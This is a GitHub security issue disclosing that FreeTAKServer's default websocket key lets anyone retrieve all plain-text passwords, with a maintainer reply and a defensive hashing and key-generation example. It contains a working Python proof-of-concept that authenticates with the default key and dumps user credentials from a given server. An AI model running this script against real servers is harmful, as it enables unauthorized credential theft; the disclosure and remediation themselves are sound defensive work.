
Security vulnerability exposes passwords to unauthorized users in plain text #75

Open
brian7704 opened this issue May 30, 2024 · 1 comment

brian7704 commented May 30, 2024

Hi guys,

I was checking out the websocket API on my server and found a vulnerability. This vulnerability allows an unauthorized user that can access port 19023 on a FreeTAKServer with the default configuration to see all the usernames and passwords on that server in plain text. An attacker could also add a user for themselves or do anything else documented in the websocket API. This vulnerability is caused by a few issues:

  • Passwords are stored in the database in plain text
  • The default websocket API key is {"Authenticate": "YourWebsocketKey"} on all installations of FTS as far as I can tell
  • The systemUsers websocket API call returns all users along with their plain text passwords

This vulnerability can be partially mitigated by changing FTS_WEBSOCKET_KEY in /opt/FTSConfig.yml and WEBSOCKETKEY in the UI's config.py. However, this would only prevent unauthorized users from seeing passwords in plain text. Authorized users would still be able to see each other's passwords.

Below is a proof of concept script which has been tested and confirmed working on all versions from at least 2.0.21 from March 2023 up to the current version. Older versions may also be affected. The requirements to run this script against an FTS server with version 2.1.3 and older are:

pip3 install python-socketio==4.6.0
pip3 install python-engineio==3.13.2
pip3 install socketio

And for FTS servers 2.1.4.5 and up:

pip3 install python-socketio -U
pip3 install python-engineio -U
pip3 install socketio

To run the script you must specify your FTS server's address, for example:

python3 vulnerability_script.py localhost

import socketio
import sys

sio = socketio.Client()

@sio.event
def connect():
    print('connection established')
    sio.emit("authenticate", '{"Authenticate": "YourWebsocketKey"}')

@sio.event
def userUpdate(data):
    print(data)
    sio.disconnect()

@sio.event
def systemUsersUpdate(data):
    print(data)
    sio.emit("users")

@sio.event
def authentication(data):
    print("Authentication successful")
    sio.emit("systemUsers")

@sio.event
def disconnect():
    print('disconnected from server')


sio.connect('http://' + sys.argv[1] + ':19023')
sio.wait()
@brothercorvo brothercorvo added this to the 2.3 milestone Jun 9, 2024
@brothercorvo brothercorvo transferred this issue from FreeTAKTeam/FreeTakServer Jun 9, 2024
@brothercorvo brothercorvo added the bug Something isn't working label Jun 9, 2024
brothercorvo (Contributor) commented

@brian7704 thank you for pointing this out. We are going to take the following measures:

  1. encrypt the password in the DB
  2. generate a random websocketkey
  3. implement https for all the relevant APIs
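The three root causes listed in the report (plain-text passwords in the database, a shared default websocket key, and a systemUsers reply that carries password fields) map directly onto the measures in the reply above. The following is an added illustration of what those measures look like in Python; it is not FreeTAKServer code, and the function names, the user record layout and the stored-hash format (`pbkdf2_sha256$iterations$salt$hash`) are assumptions made for this example.

```python
import hashlib
import hmac
import secrets
from typing import Optional

# Added example, not FreeTAKServer code. Shows salted password hashing with
# constant-time verification, a per-installation random websocket key, and
# a user listing that never includes password material.

# Iteration count in the range recommended for PBKDF2-HMAC-SHA256 (assumption:
# tune to the deployment's hardware budget).
PBKDF2_ITERATIONS = 600_000
HASH_TAG = "pbkdf2_sha256"


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Derive a salted hash and return a self-describing string for storage.

    Storing this instead of the password means a database read (or the
    systemUsers call) cannot reveal the credential itself.
    """
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS
    )
    return f"{HASH_TAG}${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    try:
        tag, iterations, salt_hex, digest_hex = stored.split("$")
        if tag != HASH_TAG:
            return False
        salt = bytes.fromhex(salt_hex)
        expected = bytes.fromhex(digest_hex)
        rounds = int(iterations)
    except ValueError:
        # Malformed record: treat as a failed login rather than crashing.
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return hmac.compare_digest(candidate, expected)


def generate_websocket_key() -> str:
    """Random per-installation key to replace the shared default value."""
    return secrets.token_urlsafe(32)


def check_websocket_key(presented: str, expected: str) -> bool:
    """Constant-time check of the key sent in the 'authenticate' event."""
    return hmac.compare_digest(presented.encode("utf-8"), expected.encode("utf-8"))


def public_user_view(users: list) -> list:
    """Build a systemUsers-style reply with every password field stripped.

    The record layout (dicts with a 'password' key) is an assumption.
    """
    return [{k: v for k, v in user.items() if k != "password"} for user in users]


if __name__ == "__main__":
    # Constructed sample data for a stand-alone run.
    record = {"name": "alice", "role": "admin", "password": hash_password("hunter2")}
    print("stored:", record["password"])
    print("login ok:", verify_password("hunter2", record["password"]))
    print("login bad:", verify_password("wrong", record["password"]))
    key = generate_websocket_key()
    print("default key accepted:", check_websocket_key("YourWebsocketKey", key))
    print("systemUsers reply:", public_user_view([record]))
```

The key points for the fix: the stored value is a one-way hash, so neither a database dump nor an API reply can return the original password; the websocket key is generated with `secrets` at install time rather than shipped as a constant; and the API serialiser drops the password field before sending, so even authorized users cannot read each other's credentials through systemUsers.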
